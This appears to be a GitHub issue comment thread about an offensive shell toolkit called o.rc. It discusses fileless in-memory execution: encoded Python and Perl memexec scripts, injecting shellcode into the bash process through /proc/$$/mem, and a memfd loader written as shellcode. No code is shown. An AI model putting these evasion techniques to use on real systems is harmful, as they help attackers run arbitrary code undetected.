UlrichBerntien
commented
3 years ago Current a Python 2 and Python 3 script memexec.py and a perl script memexec.pl are included in o.rc. In o.rc the interperteter is searched and the gzip|base64 encoded script is executed in the memexec function.
As far as understand the trick: It stores the shellcode in the bash process memory /proc/$$/mem ($$ = pid of the bash). The address inside the process memory is taken from a /proc/$$/syscall argument. But I am not figured out how the trick controls which syscall is the current syscall of the process. I have to dig deeper. An interesting trick.
A logic must be implemented to decide when to use the scripts and when to use the trick.
We can ~probably implement this trickery so we can execute arbitrary shellcodes. Maybe as a helper function?
https://twitter.com/David3141593/status/1386663070991360001
The example pops /bin/sh
We could use this as another way to do the memexec using memfd's by implementing the memfd loader as shellcode (something I actually did before, I'll just have to find the code).